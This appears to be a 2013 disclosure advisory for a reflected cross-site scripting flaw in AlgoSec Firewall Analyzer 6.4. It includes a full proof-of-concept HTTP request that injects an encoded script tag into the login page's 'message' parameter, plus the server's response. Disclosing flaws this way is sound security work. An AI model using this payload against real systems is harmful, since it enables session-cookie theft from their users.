AlgoSec Firewall Analyzer version 6.4 suffers from a cross site scripting vulnerability.
9bcc2f40ac9e807f1a16248fc4024bf27aad4a0478dac50095192c75003afc86
================================================================================================================================================================
AlgoSec Firewall Analyzer Version v6.4 cross-site scripting (XSS) Vulnerability
================================================================================================================================================================
#Date- 21/8/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
#Vulnerbility
AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities
========================================================================================================================
Request
========================================================================================================================
GET /BusinessFlow/login?message=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%2811111%29%3C%2fScRiPt%3E HTTP/1.1
Host: 172.28.154.163
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1
========================================================================================================================
Response
========================================================================================================================
HTTP/1.0 200 OK
Date: Wed, 21 Aug 2013 13:57:31 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN